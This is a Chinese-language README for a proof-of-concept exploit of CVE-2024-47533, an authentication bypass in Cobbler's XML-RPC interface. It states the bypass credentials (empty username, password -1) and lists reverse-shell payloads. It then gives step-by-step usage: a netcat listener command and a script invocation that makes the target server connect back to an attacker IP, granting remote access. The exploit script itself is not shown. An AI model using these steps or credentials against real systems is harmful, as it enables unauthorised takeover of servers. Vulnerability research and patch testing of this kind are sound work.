CVE-2024-47533 是 Cobbler(版本 3.0.0 到 3.2.3 之前以及 3.3.7)中的一个严重身份验证绕过漏洞,允许未经身份验证的远程代码执行通过 XMLRPC 接口。
⚠️ 通过认证绕过实现的 Cobbler 高危远程代码执行
🛠️ PoC 实现由 @dollarboysushil 提供
Cobbler 是一款 Linux 安装服务器,可快速搭建网络安装环境。在 3.0.0 至 3.2.3(不含)及 3.3.7(不含)版本中,存在一个认证漏洞。函数 utils.get_shared_secret() 始终返回 -1,允许任何人使用空用户名 ('') 和密码 -1 连接到 Cobbler XML-RPC 接口。这使得具有网络访问权限的攻击者能够完全控制 Cobbler 服务器。该漏洞已在 3.2.3 和 3.3.7 版本中修复。
该漏洞由 utils.get_shared_secret() 函数对共享密钥的不当处理引起,该函数始终返回 -1,从而有效绕过了认证。这允许任何网络用户通过空凭据连接到 Cobbler 的 XMLRPC 接口并执行任意命令。
http://<target>:25151/ — Cobbler 的 XMLRPC API 端点
该漏洞利用脚本支持多种反弹 Shell 载荷,包括:
nc、nc2)在您的机器上启动 Netcat 监听器:
nc -lvnp 4444

执行漏洞利用脚本 CVE-2024-47533-dbs.py。
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

成功执行后,反弹 Shell 将回连至监听器,从而授予攻击者对服务器的远程访问权限。
